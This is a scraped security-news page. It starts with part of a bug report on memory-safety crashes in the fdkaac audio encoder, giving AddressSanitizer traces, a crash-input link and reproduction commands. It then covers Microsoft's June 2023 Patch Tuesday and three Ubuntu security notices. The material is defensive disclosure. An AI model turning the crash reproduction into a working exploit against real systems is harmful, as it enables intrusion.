      0x0fe03f9453b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fe03f9453c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fe03f9453d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0fe03f9453e0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fe03f9453f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fe03f945400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fe03f945410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fe03f945420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fe03f945430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1664==ABORTING
    

I also found a stack-buffer-overflow in fdkaac, src/main.c:81, read\_callback(). Here is the ASAN output.

    =================================================================
    ==30393==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc7d3cc380 at pc 0x0000004372a8 bp 0x7ffc7d3ca330 sp 0x7ffc7d3c9ae0
    WRITE of size 19584 at 0x7ffc7d3cc380 thread T0
    ==30393==WARNING: Can't read from symbolizer at fd 4
    ==30393==WARNING: Can't read from symbolizer at fd 4
    ==30393==WARNING: Can't read from symbolizer at fd 4
    ==30393==WARNING: Can't read from symbolizer at fd 4
    ==30393==WARNING: Failed to use and restart external symbolizer!
        #0 0x4372a7  (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x4372a7)
        #1 0x547356  (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x547356)
        #2 0x568879  (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x568879)
    
    Address 0x7ffc7d3cc380 is located in stack of thread T0 at offset 8224 in frame
        #0 0x5685bf  (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x5685bf)
    
      This frame has 1 object(s):
        [32, 8224) 'buff' (line 57) <== Memory access at offset 8224 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x4372a7) 
    Shadow bytes around the buggy address:
      0x10000fa71820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000fa71830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000fa71840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000fa71850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000fa71860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000fa71870:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x10000fa71880: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x10000fa71890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000fa718a0: 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f8 f2 f8 f2
      0x10000fa718b0: f8 f2 f8 f2 f8 f2 f8 f2 f8 f2 04 f2 00 f3 f3 f3
      0x10000fa718c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==30393==ABORTING
    

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/fdkaac

**Validation steps**

git clone https://github.com/nu774/fdkaac  
cd fdkaac/  
autoreconf -i  
CC=clang CXX=clang++ CFLAGS="$CFLAGS -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="$CXXFLAGS -fsanitize=address -fno-omit-frame-pointer" ./configure  
make  
./fdkaac -p5 -b64 fdkaac-hbo -o /dev/null

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2023-34824: Heap-buffer-overflow found in fdkaac · Issue #55 · nu774/fdkaac

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.
Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser

Patch Tuesday / Vulnerability

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.

Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser.

It's worth noting that Microsoft also closed out 26 other flaws in Edge – all of them rooted in Chromium itself – since the release of May Patch Tuesday updates. This comprises CVE-2023-3079, a zero-day bug that Google disclosed as being actively exploited in the wild last week.

The June 2023 updates also mark the first time in several months that doesn't feature any zero-day flaw in Microsoft products that's publicly known or under active attack at the time of release.

Topping the list of fixes is CVE-2023-29357 (CVSS score: 9.8), a privilege escalation flaw in SharePoint Server that could be exploited by an attacker to gain administrator privileges.

"An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user," Microsoft said. "The attacker needs no privileges nor does the user need to perform any action."

Also patched by Redmond are three critical remote code execution bugs (CVE-2023-29363, CVE-2023-32014, and CVE-2023-32015, CVSS scores: 9.8) in Windows Pragmatic General Multicast (PGM) that could be weaponized to "achieve remote code execution and attempt to trigger malicious code."

Microsoft previously addressed a similar flaw in the same component (CVE-2023-28250, CVSS score: 9.8), a protocol designed to deliver packets between multiple network members in a reliable manner, in April 2023.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

Also resolved by the tech giant are two remote code execution bugs impacting Exchange Server (CVE-2023-28310 and CVE-2023-32031) that could permit an authenticated attacker to achieve remote code execution on affected installations.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Arm
*   Cisco
*   Citrix
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MOVEit Transfer
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Splunk
*   Synology
*   Trend Micro
*   Veritas
*   VMware
*   WordPress
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Updates to Patch Critical Flaws in Windows and Other Software

Ubuntu Security Notice 6161-1 - It was discovered that .NET did not properly enforce certain restrictions when deserializing a DataSet or DataTable from XML. An attacker could possibly use this issue to elevate their privileges. Kevin Jones discovered that .NET did not properly handle the AIA fetching process for X.509 client certificates. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6161-1  
June 13, 2023

dotnet6, dotnet7 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in .NET.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

It was discovered that .NET did not properly enforce certain  
restrictions when deserializing a DataSet or DataTable from  
XML. An attacker could possibly use this issue to elevate their  
privileges. (CVE-2023-24936)

Kevin Jones discovered that .NET did not properly handle the  
AIA fetching process for X.509 client certificates. An attacker  
could possibly use this issue to cause a denial of service.  
(CVE-2023-29331)

Kalle Niemitalo discovered that the .NET package manager,  
NuGet, was susceptible to a potential race condition. An  
attacker could possibly use this issue to perform remote  
code execution. (CVE-2023-29337)

Tom Deseyn discovered that .NET did not properly process certain  
arguments when extracting the contents of a tar file. An attacker  
could possibly use this issue to elevate their privileges. This  
issue only affected the dotnet7 package. (CVE-2023-32032)

It was discovered that .NET did not properly handle memory in  
certain circumstances. An attacker could possibly use this issue  
to cause a denial of service or perform remote code execution.  
(CVE-2023-33128)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~23.04.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~23.04.1  
   dotnet-host                             6.0.118-0ubuntu1~23.04.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~23.04.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~23.04.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~23.04.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~23.04.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~23.04.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~23.04.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~23.04.1  
   dotnet6                                 6.0.118-0ubuntu1~23.04.1  
   dotnet7                                 7.0.107-0ubuntu1~23.04.1

Ubuntu 22.10:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.10.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.10.1  
   dotnet-host                             6.0.118-0ubuntu1~22.10.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~22.10.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.10.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.10.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~22.10.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~22.10.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~22.10.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~22.10.1  
   dotnet6                                 6.0.118-0ubuntu1~22.10.1  
   dotnet7                                 7.0.107-0ubuntu1~22.10.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.04.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.04.1  
   dotnet-host                             6.0.118-0ubuntu1~22.04.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.04.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.04.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~22.04.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~22.04.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~22.04.1  
   dotnet6                                6.0.118-0ubuntu1~22.04.1  
   dotnet7                                7.0.107-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6161-1  
   CVE-2023-24936, CVE-2023-29331, CVE-2023-29337, CVE-2023-32032,  
   CVE-2023-33128

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6161-1

Ubuntu Security Notice 6160-1 - It was discovered that GNU binutils incorrectly performed bounds checking operations when parsing stabs debugging information. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6160-1June 13, 2023binutils vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:GNU binutils could be made to crash or run programs if it opened aspecially crafted file.Software Description:- binutils: GNU assembler, linker and binary utilitiesDetails:It was discovered that GNU binutils incorrectly performed bounds checkingoperations when parsing stabs debugging information. An attacker couldpossibly use this issue to cause a denial of service or execute arbitrarycode.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   binutils                        2.34-6ubuntu1.6   binutils-multiarch              2.34-6ubuntu1.6In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6160-1   CVE-2021-45078Package Information:   https://launchpad.net/ubuntu/+source/binutils/2.34-6ubuntu1.6

Ubuntu Security Notice USN-6160-1

Ubuntu Security Notice 6159-1 - It was discovered that Tornado incorrectly handled certain redirect. An remote attacker could possibly use this issue to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.

    =========================================================================Ubuntu Security Notice USN-6159-1June 13, 2023python-tornado vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Tornado could be made to redirect users to arbitrary web site if it opened aspecially crafted URL.Software Description:- python-tornado: scalable, non-blocking web server and tools - documentationDetails:It was discovered that Tornado incorrectly handled certain redirect.An remote attacker could possibly use this issue to redirect a user to anarbitrary web site and conduct a phishing attack by having user access aspecially crafted URL.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  python3-tornado                 6.2.0-3ubuntu0.1Ubuntu 16.04 LTS (Available with Ubuntu Pro):  python-tornado                  4.2.1-1ubuntu3.1+esm1  python3-tornado                 4.2.1-1ubuntu3.1+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6159-1  CVE-2023-28370Package Information:  https://launchpad.net/ubuntu/+source/python-tornado/6.2.0-3ubuntu0.1

Tag

#ubuntu